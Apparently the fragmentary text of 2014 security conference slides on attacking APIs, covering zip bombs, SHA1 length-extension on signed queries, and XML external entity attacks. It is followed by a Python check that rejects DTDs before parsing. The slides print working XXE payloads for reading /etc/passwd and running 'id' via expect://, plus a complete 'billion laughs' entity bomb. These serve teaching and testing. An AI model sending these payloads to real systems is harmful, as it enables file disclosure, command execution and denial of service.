Sergey Belov
$ whoami
ZIP
© 2002—2014, Digital Security
Hacking via API
42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?
Say HELLO to
ZIP BOMB!
http://habrahabr.ru/post/186160/
Crypto
Query signing
Sign = sha*(…+DATA+…)
APIkey
But why?
A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)
A=1&B=2&C=3\x80\x00\x00…\x02&C=4
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
Request hijacking…
How?
DTD Example:
XML example:
<author>&writer;&copyright;</author>
XML entities?
External Entity!
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>
<foo>&xxe;</foo>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
]>">
"expect://id" >]>
<foo>&xxe;</foo>
XML Bombs!
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz
(#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]>
<lolz>&lol9;</lolz>
© 2002—2014, Digital Security 51
What are we talking about?
Examples?
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896
Development:
• Disable entities
Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]
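The "Disable entities" advice applied to the payloads shown on the slides: every one of them (file:///etc/passwd, expect://id, the lolz bomb) needs an inline DOCTYPE with ENTITY declarations, so a pre-parse that refuses any DTD construct blocks them all before expansion. This is an added example in Python's standard library, not code from the slides; the two XXE samples are re-typed from the slides and the benign one is constructed.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class UnsafeXML(Exception):
    """The document declares a DTD, an entity, or an external reference."""


def _reject(reason):
    # Raising inside an expat handler stops the parse immediately, so an
    # entity bomb is refused at its first declaration and never expanded.
    def handler(*_args):
        raise UnsafeXML(reason)
    return handler


def assert_no_dtd(doc: bytes) -> None:
    """Scan `doc` with expat and raise UnsafeXML on the first DTD construct."""
    p = expat.ParserCreate()
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    p.StartDoctypeDeclHandler = _reject("DOCTYPE not allowed")
    p.EntityDeclHandler = _reject("ENTITY declaration not allowed")
    p.ExternalEntityRefHandler = _reject("external entity reference not allowed")
    p.Parse(doc, True)


def is_safe(doc: bytes) -> bool:
    """True when `doc` is well-formed XML with no DTD, entity or external reference."""
    try:
        assert_no_dtd(doc)
    except (UnsafeXML, expat.ExpatError):
        return False
    return True


def safe_parse(doc: bytes) -> ET.Element:
    """Parse untrusted XML only after the DTD check has passed."""
    assert_no_dtd(doc)
    return ET.fromstring(doc)


# Samples: the two XXE payloads from the slides, plus a constructed benign document.
XXE_FILE = b'<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
XXE_EXPECT = b'<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "expect://id">]><foo>&xxe;</foo>'
BENIGN = b"<author>plain text, no DTD</author>"
```

Because the check aborts at the DOCTYPE, it does not depend on the XML library's own amplification limits for the lolz bomb.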